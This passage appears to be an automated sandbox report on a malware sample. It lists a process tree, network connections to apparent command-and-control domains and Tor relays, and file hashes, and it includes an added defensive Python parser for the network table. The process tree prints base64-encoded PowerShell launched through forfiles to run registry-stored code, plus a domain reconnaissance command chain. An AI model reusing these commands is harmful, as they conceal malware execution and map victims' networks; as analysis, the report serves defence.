| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Restr.exe
"C:\Users\Admin\AppData\Local\Temp\Restr.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17412 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82960 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82964 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82968 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82972 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82976 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82980 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82984 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp" "c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC215.tmp" "c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4376 -ip 4376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 964
C:\Windows\system32\cmd.exe
cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5B1B.bin0
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5B1B.bin0 > C:\Users\Admin\AppData\Local\Temp\5B1B.bin & del C:\Users\Admin\AppData\Local\Temp\5B1B.bin0"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\whoami.exe
whoami /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8482.bin0 > C:\Users\Admin\AppData\Local\Temp\8482.bin & del C:\Users\Admin\AppData\Local\Temp\8482.bin0"
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\268A.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 67.26.111.254:80 | | tcp |
| NL | 67.26.111.254:80 | | tcp |
| NL | 67.26.111.254:80 | | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| FI | 95.217.135.250:443 | | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| NL | 45.137.184.31:80 | 45.137.184.31 | tcp |
| RU | 93.95.100.166:80 | 93.95.100.166 | tcp |
| JP | 172.104.79.222:80 | 172.104.79.222 | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| RU | 93.95.100.166:80 | 93.95.100.166 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| RU | 93.95.100.166:80 | 93.95.100.166 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| NL | 45.137.184.31:80 | 45.137.184.31 | tcp |
| US | 8.8.8.8:53 | unavas.xyz | udp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| DE | 188.74.25.46:9030 | 188.74.25.46 | tcp |
| SE | 178.73.210.118:8080 | 178.73.210.118 | tcp |
| HU | 91.219.238.221:80 | 91.219.238.221 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| EG | 41.77.137.114:80 | 41.77.137.114 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| NL | 88.221.144.192:80 | | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| JP | 50.31.252.28:80 | | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 199.249.230.78:80 | 199.249.230.78 | tcp |
| EG | 41.77.137.114:80 | 41.77.137.114 | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| FR | 163.172.53.201:80 | 163.172.53.201 | tcp |
| US | 199.249.230.85:80 | 199.249.230.85 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| CH | 45.90.59.63:80 | 45.90.59.63 | tcp |
| DE | 131.188.40.189:80 | 131.188.40.189 | tcp |
| GB | 51.89.149.148:18909 | 51.89.149.148 | tcp |
| BE | 87.67.210.135:45473 | 87.67.210.135 | tcp |
| CH | 141.255.161.167:80 | 141.255.161.167 | tcp |
| LV | 46.183.217.3:80 | 46.183.217.3 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| SE | 178.132.78.148:80 | 178.132.78.148 | tcp |
| DE | 5.9.98.43:80 | 5.9.98.43 | tcp |
| DE | 212.227.206.135:9030 | 212.227.206.135 | tcp |
| CZ | 37.157.197.143:80 | 37.157.197.143 | tcp |
| LU | 107.189.12.47:80 | 107.189.12.47 | tcp |
| AR | 131.255.4.96:80 | | tcp |
| US | 45.61.185.53:80 | 45.61.185.53 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| NL | 185.19.151.8:80 | 185.19.151.8 | tcp |
| DE | 138.201.169.12:80 | 138.201.169.12 | tcp |
| US | 199.249.230.85:80 | 199.249.230.85 | tcp |
| GB | 51.89.149.148:18909 | 51.89.149.148 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| NL | 5.255.102.5:9030 | 5.255.102.5 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| CL | 37.235.52.67:80 | 37.235.52.67 | tcp |
| SE | 193.189.100.196:80 | 193.189.100.196 | tcp |
| US | 199.249.230.70:80 | 199.249.230.70 | tcp |
| CH | 185.32.221.201:80 | 185.32.221.201 | tcp |
| US | 99.149.215.67:80 | 99.149.215.67 | tcp |
| US | 199.249.230.86:80 | 199.249.230.86 | tcp |
| US | 199.249.230.142:80 | 199.249.230.142 | tcp |
| UA | 95.67.38.55:9030 | 95.67.38.55 | tcp |
| US | 199.249.230.157:80 | 199.249.230.157 | tcp |
| US | 199.249.230.70:80 | 199.249.230.70 | tcp |
| CH | 195.206.105.217:80 | 195.206.105.217 | tcp |
| US | 208.70.148.68:9030 | 208.70.148.68 | tcp |
| TW | 118.163.74.160:80 | 118.163.74.160 | tcp |
| US | 199.249.230.85:80 | 199.249.230.85 | tcp |
| US | 185.220.103.115:80 | 185.220.103.115 | tcp |
| US | 199.249.230.140:80 | 199.249.230.140 | tcp |
| US | 208.70.148.68:9030 | 208.70.148.68 | tcp |
| US | 199.249.230.86:80 | 199.249.230.86 | tcp |
| FR | 135.125.55.228:80 | 135.125.55.228 | tcp |
| SG | 139.162.43.196:80 | 139.162.43.196 | tcp |
| US | 51.81.248.194:80 | 51.81.248.194 | tcp |
| SE | 178.132.78.148:80 | | tcp |
| US | 199.249.230.78:80 | 199.249.230.78 | tcp |
| SE | 193.189.100.202:80 | 193.189.100.202 | tcp |
| US | 185.220.103.115:80 | 185.220.103.115 | tcp |
| US | 199.249.230.175:80 | 199.249.230.175 | tcp |
| US | 205.185.117.53:8080 | 205.185.117.53 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| US | 199.249.230.180:80 | 199.249.230.180 | tcp |
| US | 199.249.230.168:80 | | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| SE | 178.132.78.148:80 | | tcp |
| US | 199.249.230.168:80 | | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| SE | 178.132.78.148:80 | | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| US | 199.249.230.168:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| SE | 178.132.78.148:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| US | 199.249.230.168:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| SE | 178.132.78.148:80 | | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| US | 199.249.230.168:80 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| SE | 178.132.78.148:80 | | tcp |
| US | 199.249.230.168:80 | | tcp |
| FR | 163.172.94.144:9030 | | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
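The Network table mixes three things that separate cleanly once the rows are parsed: DNS queries to 8.8.8.8 followed by TLS to the two .xyz hosts, a lookup of curlmyip.net (an external-IP echo service, i.e. the sample learning its own public address), and a wide fan-out of connections to bare IP addresses on ports 80, 443, 8080 and 9030, the last being Tor's default directory port (DirPort); this fan-out is what the report's "Uses Tor communications" signature is reacting to. The Python below is an added example, not tooling from the report or the sandbox. It parses rows in the table's own layout (an excerpt is embedded), tolerates rows where an empty Domain cell let the protocol slide one column left, and treats the `IP_ECHO_SERVICES` entries other than curlmyip.net as this example's assumption.

```python
"""Connection-table heuristics for the Network section above (added example, not from the report).

Pulls out what an analyst checks first on a sample tagged "Uses Tor communications":
TCP destinations with no hostname behind them (the Domain cell is blank or repeats the
IP, so no DNS answer led there), connections to 9030 (Tor's default directory port,
DirPort), lookups of external-IP echo services such as curlmyip.net, and the per-port
fan-out, which is wide while a Tor client bootstraps.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List

TOR_DIRPORT = 9030
# "What is my IP" services; curlmyip.net is the one seen here, the rest are this example's additions.
IP_ECHO_SERVICES = {"curlmyip.net", "icanhazip.com", "api.ipify.org", "ifconfig.me"}


@dataclass(frozen=True)
class Flow:
    country: str
    host: str
    port: int
    domain: str   # name the sandbox tied to the flow, "" when none
    proto: str    # "tcp" or "udp"


def parse_rows(lines: Iterable[str]) -> List[Flow]:
    """Parse `| Country | Destination | Domain | Proto |` rows into Flow records.

    A row with an empty Domain cell sometimes arrives as `| CC | ip:port | tcp | |`
    (the protocol slid one column left); both layouts are accepted.
    """
    flows = []
    for line in lines:
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if proto == "" and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain
        host, _, port = dest.rpartition(":")
        if not host:                       # no ":port" suffix
            host, port = dest, "0"
        flows.append(Flow(country, host, int(port), domain, proto.lower()))
    return flows


def analyse(flows: Iterable[Flow]) -> dict:
    """Summarise the flows; lists are sorted so the result is stable."""
    dns_names, named, ip_only, dirport, echo = set(), set(), set(), set(), set()
    ports = Counter()
    for f in flows:
        if f.proto == "udp" and f.port == 53:
            dns_names.add(f.domain)        # what the sample asked the resolver for
            continue
        if f.proto != "tcp":
            continue
        ports[f.port] += 1
        if f.domain in ("", f.host):
            ip_only.add(f.host)            # reached by literal address, no resolution seen
        else:
            named.add(f.domain)
        if f.port == TOR_DIRPORT:
            dirport.add(f.host)
        if f.domain in IP_ECHO_SERVICES:
            echo.add(f.domain)
    return {
        "dns_names": sorted(dns_names),
        "named_hosts": sorted(named),
        "ip_only_hosts": sorted(ip_only),
        "tor_dirport_hosts": sorted(dirport),
        "ip_check_hosts": sorted(echo),
        "tcp_ports": dict(ports),
    }


# Excerpt copied from the Network table of this report, including one row in the slid layout.
SAMPLE_ROWS = [
    "| Country | Destination | Domain | Proto |",
    "| US | 8.8.8.8:53 | gogojoob.xyz | udp |",
    "| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |",
    "| NL | 67.26.111.254:80 | tcp | |",
    "| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |",
    "| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |",
    "| US | 8.8.8.8:53 | unavas.xyz | udp |",
    "| NL | 91.242.229.120:443 | unavas.xyz | tcp |",
    "| DE | 188.74.25.46:9030 | 188.74.25.46 | tcp |",
    "| US | 8.8.8.8:53 | curlmyip.net | udp |",
    "| FI | 135.181.84.242:80 | curlmyip.net | tcp |",
    "| NL | 5.255.102.5:9030 | 5.255.102.5 | tcp |",
    "| US | 199.249.230.73:80 | 199.249.230.73 | tcp |",
    "| FR | 163.172.94.144:9030 | | tcp |",
    "| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |",
]


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(parse_rows(SAMPLE_ROWS)), indent=2))
```

On the excerpt the only named TCP peers are gogojoob.xyz, unavas.xyz and curlmyip.net; every other destination was reached by literal address, three of them on 9030. Run over the full table the same split holds, which is the shape to expect from a Tor client bootstrapping from hard-coded directory information rather than from a hostname-based C2 list. The port number alone is not proof (9030 is only the default), so the DirPort hits are best read together with the IP-only fan-out and the absence of matching DNS answers.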
Files
memory/4376-130-0x00000000004AE000-0x00000000004BA000-memory.dmp
memory/4376-131-0x00000000004AE000-0x00000000004BA000-memory.dmp
memory/4376-132-0x00000000005B0000-0x00000000005BC000-memory.dmp
memory/4376-133-0x0000000001000000-0x000000000106F000-memory.dmp
memory/4376-134-0x0000000000D40000-0x0000000000D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ves0881\imagestore.dat
| MD5 | 363ab12b18b904149383cd18a3cebdb5 |
| SHA1 | 1f1cd7407638f2f2b349aee61fe1de162ed3ea4f |
| SHA256 | 0ff90d9f35c1cc3ece0e6bfdbe3408f86551d8f94b13462eb81c008e71c732ad |
| SHA512 | 479113739f9dd4662ba5c14a0cb69b5623f5840794b7ea346e022a80f9d7f069dd0bb3e406e27273e3101019e022e9e75997c4a494ec0fc77ea04cfc436aed04 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 707b3dbca770b75e95ad28432f3382be |
| SHA1 | fd1a606c1b3485980b3feb269c77a6ec997164ff |
| SHA256 | 92dabf8d30c3914a107c6301d9f7306bbb5585b1e9067288428a816d86df18ea |
| SHA512 | 763a26a15a4ebcd224ab58c21cc8e956184b06114b853b411e81b9fe8d438df53ae73b4af6fe073dc7c4fff040068d843836536d57567954e841ce0b196fcf79 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\K6H59MEI\favicon[2].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
memory/3884-144-0x000001EA332D0000-0x000001EA332F2000-memory.dmp
memory/3884-145-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp
memory/3884-146-0x000001EA31680000-0x000001EA31690000-memory.dmp
memory/3884-147-0x000001EA31680000-0x000001EA31690000-memory.dmp
memory/3884-148-0x000001EA31680000-0x000001EA31690000-memory.dmp
memory/3896-151-0x000002644EAD3000-0x000002644EAD5000-memory.dmp
memory/3896-150-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp
memory/3896-149-0x000002644EAD0000-0x000002644EAD2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/2864-154-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline
| MD5 | 9c644120c46a4b3d6b0a4fca6b11b28d |
| SHA1 | c29929e67d5856c0d844a174b6c185299c84876d |
| SHA256 | 52245374ba820b7241465c7952ae45ea06df99e1110a6df44f666863e4ca7bea |
